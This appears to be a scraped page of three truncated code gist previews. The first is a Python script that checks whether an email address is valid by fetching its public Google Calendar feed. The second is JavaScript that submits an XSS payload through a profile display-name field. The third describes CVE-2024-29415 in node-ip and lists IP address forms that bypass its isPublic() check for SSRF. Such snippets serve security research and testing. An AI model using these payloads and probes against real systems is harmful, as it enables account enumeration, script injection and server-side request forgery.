This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import requests | |
from bs4 import BeautifulSoup | |
def check_calendar_url(email): | |
url = f"https://calendar.google.com/calendar/ical/{email}/public/basic.ics" | |
try: | |
response = requests.get(url) | |
if response.status_code == 200: | |
print("The email address is valid!") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
// Crafty XSS payload | |
var maliciousPayload = "<img src=x onerror=alert('XSS Attack!') />"; | |
// Send the payload through the display_name field | |
var xhr = new XMLHttpRequest(); | |
xhr.open("POST", "/update_profile", true); // Replace "/update_profile" with the appropriate endpoint | |
xhr.setRequestHeader("Content-Type", "application/json"); | |
xhr.onreadystatechange = function() { | |
if (xhr.readyState === XMLHttpRequest.DONE) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2024-29415 represents a significant security vulnerability in the node-ip package, a popular Node.js library used to retrieve IPv4 addresses. This library, instrumental in many server-side applications, has been identified as containing a serious flaw in its IP address classification function, isPublic(). This flaw can lead to Server-Side Request Forgery (SSRF) attacks when private IP addresses are misclassified as public. | |
Vulnerability Description | |
The core issue lies in the isPublic() function, which incorrectly identifies certain IP address formats as public, even when they represent private or reserved addresses. Notable examples of such misclassifications include: | |
127.1 | |
01200034567 | |
012.1.2.3 | |
000:0:0000::01 | |
::fFFf:127.0.0.1 |